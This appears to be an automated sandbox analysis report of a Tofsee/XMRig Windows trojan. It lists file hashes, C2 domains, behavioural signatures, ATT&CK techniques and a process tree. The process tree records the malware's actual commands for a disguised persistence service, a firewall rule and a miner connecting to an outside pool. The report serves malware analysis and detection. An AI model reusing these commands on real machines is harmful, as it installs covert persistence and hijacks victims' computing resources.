Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    05-06-2022 11:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bfdac82979537985b490258fb70febdb94c3f4f6628d8ab16826eae3991bc925.exe

  • Size

    308KB

  • MD5

    2841b7ce1412fa3c2c1049d6e338adba

  • SHA1

    f6446ce732b57e17454311474916b2d3a6affaf9

  • SHA256

    bfdac82979537985b490258fb70febdb94c3f4f6628d8ab16826eae3991bc925

  • SHA512

    02613e1700308df77b901c39c1f0635683d16b5fc29e23ac6bf72d275e09a80bde17b0d47cb77eb7a6c1992c11aa4e60a50efd990b46b881f77f567536e9a9ec

Score
10/10
tofseexmrigcollectionevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bfdac82979537985b490258fb70febdb94c3f4f6628d8ab16826eae3991bc925.exe
    "C:\Users\Admin\AppData\Local\Temp\bfdac82979537985b490258fb70febdb94c3f4f6628d8ab16826eae3991bc925.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3200
  • C:\Users\Admin\AppData\Local\Temp\4D2.exe
    C:\Users\Admin\AppData\Local\Temp\4D2.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4608
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\srnadzcr\
      2⤵
        PID:4220
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uiofjban.exe" C:\Windows\SysWOW64\srnadzcr\
        2⤵
          PID:4228
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create srnadzcr binPath= "C:\Windows\SysWOW64\srnadzcr\uiofjban.exe /d\"C:\Users\Admin\AppData\Local\Temp\4D2.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:5096
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description srnadzcr "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4396
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start srnadzcr
          2⤵
          • Launches sc.exe
          PID:4332
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4584
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
        • Accesses Microsoft Outlook profiles
        • outlook_office_path
        • outlook_win_path
        PID:4696
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe
        1⤵
          PID:5052
        • C:\Windows\SysWOW64\srnadzcr\uiofjban.exe
          C:\Windows\SysWOW64\srnadzcr\uiofjban.exe /d"C:\Users\Admin\AppData\Local\Temp\4D2.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4344
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Windows security bypass
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:1228
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3576

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        New Service

        1
        T1050

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        New Service

        1
        T1050

        Defense Evasion

        Disabling Security Tools

        1
        T1089

        Modify Registry

        2
        T1112

        Credential Access

        Discovery

        System Information Discovery

        2
        T1082

        Query Registry

        1
        T1012

        Peripheral Device Discovery

        1
        T1120

        Lateral Movement

        Collection

        Email Collection

        1
        T1114

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\4D2.exe
          Filesize

          310KB

          MD5

          a45e220e667e0d0e85b476f6e5835086

          SHA1

          1a48b13932940ec999cbd46ff74406bc9931806c

          SHA256

          3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6

          SHA512

          852487ba3bf35ef128e7ce61d7ecde726eacf4cab2ee9c45632afe22662ff8fe713d243c73b07ffb0ae2c416218c9c8e548dba3214de9ad169265bbd925604ef

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\4D2.exe
          Filesize

          310KB

          MD5

          a45e220e667e0d0e85b476f6e5835086

          SHA1

          1a48b13932940ec999cbd46ff74406bc9931806c

          SHA256

          3cc581151b1b4d4b6a61a806a465b1382a6aa47d4534444c1baeeb9e83c487e6

          SHA512

          852487ba3bf35ef128e7ce61d7ecde726eacf4cab2ee9c45632afe22662ff8fe713d243c73b07ffb0ae2c416218c9c8e548dba3214de9ad169265bbd925604ef

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\uiofjban.exe
          Filesize

          13.0MB

          MD5

          aa276b12eea1ecb65b7502980743cf17

          SHA1

          547aecd2de0cb9149d817b8df9507dc6b81de696

          SHA256

          a9c55c44690d027443d4f88382a311d2fcc771210eee08ba1c411badc6df159a

          SHA512

          5223ef3bfb70cc732ae041bfc233da594024ffe53074d2ecbaf12079f9bf637fe3d25be1891b2f3778ba44447dd7afc0702c52ec0c57650ededf04eb66857cf8

          Download Submit
        • C:\Windows\SysWOW64\srnadzcr\uiofjban.exe
          Filesize

          13.0MB

          MD5

          aa276b12eea1ecb65b7502980743cf17

          SHA1

          547aecd2de0cb9149d817b8df9507dc6b81de696

          SHA256

          a9c55c44690d027443d4f88382a311d2fcc771210eee08ba1c411badc6df159a

          SHA512

          5223ef3bfb70cc732ae041bfc233da594024ffe53074d2ecbaf12079f9bf637fe3d25be1891b2f3778ba44447dd7afc0702c52ec0c57650ededf04eb66857cf8

          Download Submit
        • memory/1228-429-0x0000000002909A6B-mapping.dmp
          Download
        • memory/1228-496-0x0000000002900000-0x0000000002915000-memory.dmp
          Filesize

          84KB

          Download
        • memory/1228-602-0x0000000002900000-0x0000000002915000-memory.dmp
          Filesize

          84KB

          Download
        • memory/3200-143-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-147-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-126-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-127-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-128-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-129-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-130-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-131-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-132-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-133-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-134-0x0000000000711000-0x0000000000721000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3200-135-0x00000000001E0000-0x00000000001E9000-memory.dmp
          Filesize

          36KB

          Download
        • memory/3200-136-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-137-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-138-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-139-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-140-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-141-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-142-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-118-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-144-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-145-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-146-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-125-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-148-0x0000000000400000-0x00000000004F2000-memory.dmp
          Filesize

          968KB

          Download
        • memory/3200-149-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-150-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-151-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-152-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-153-0x0000000000711000-0x0000000000721000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3200-154-0x00000000001E0000-0x00000000001E9000-memory.dmp
          Filesize

          36KB

          Download
        • memory/3200-155-0x0000000000400000-0x00000000004F2000-memory.dmp
          Filesize

          968KB

          Download
        • memory/3200-119-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-124-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-123-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-122-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-120-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-121-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3200-117-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3576-637-0x00000000032B259C-mapping.dmp
          Download
        • memory/4220-272-0x0000000000000000-mapping.dmp
          Download
        • memory/4228-289-0x0000000000000000-mapping.dmp
          Download
        • memory/4332-319-0x0000000000000000-mapping.dmp
          Download
        • memory/4344-397-0x0000000000590000-0x000000000063E000-memory.dmp
          Filesize

          696KB

          Download
        • memory/4344-435-0x0000000000400000-0x00000000004F3000-memory.dmp
          Filesize

          972KB

          Download
        • memory/4396-308-0x0000000000000000-mapping.dmp
          Download
        • memory/4584-338-0x0000000000000000-mapping.dmp
          Download
        • memory/4608-163-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-187-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-156-0x0000000000000000-mapping.dmp
          Download
        • memory/4608-158-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-160-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-161-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-159-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-162-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-345-0x0000000000400000-0x00000000004F3000-memory.dmp
          Filesize

          972KB

          Download
        • memory/4608-343-0x00000000001E0000-0x00000000001F3000-memory.dmp
          Filesize

          76KB

          Download
        • memory/4608-341-0x0000000000651000-0x0000000000662000-memory.dmp
          Filesize

          68KB

          Download
        • memory/4608-164-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-263-0x0000000000400000-0x00000000004F3000-memory.dmp
          Filesize

          972KB

          Download
        • memory/4608-224-0x00000000001E0000-0x00000000001F3000-memory.dmp
          Filesize

          76KB

          Download
        • memory/4608-222-0x0000000000651000-0x0000000000662000-memory.dmp
          Filesize

          68KB

          Download
        • memory/4608-185-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4608-190-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-184-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-296-0x0000000000830000-0x000000000089B000-memory.dmp
          Filesize

          428KB

          Download
        • memory/4696-172-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-189-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-174-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-188-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-186-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-262-0x00000000008A0000-0x0000000000914000-memory.dmp
          Filesize

          464KB

          Download
        • memory/4696-173-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-264-0x0000000000830000-0x000000000089B000-memory.dmp
          Filesize

          428KB

          Download
        • memory/4696-171-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-170-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-169-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-191-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-175-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-168-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-167-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-166-0x0000000000000000-mapping.dmp
          Download
        • memory/4696-183-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-181-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-180-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-179-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-178-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-177-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4696-176-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/5052-182-0x0000000000000000-mapping.dmp
          Download
        • memory/5052-193-0x0000000000FE0000-0x0000000000FEC000-memory.dmp
          Filesize

          48KB

          Download
        • memory/5096-297-0x0000000000000000-mapping.dmp
          Download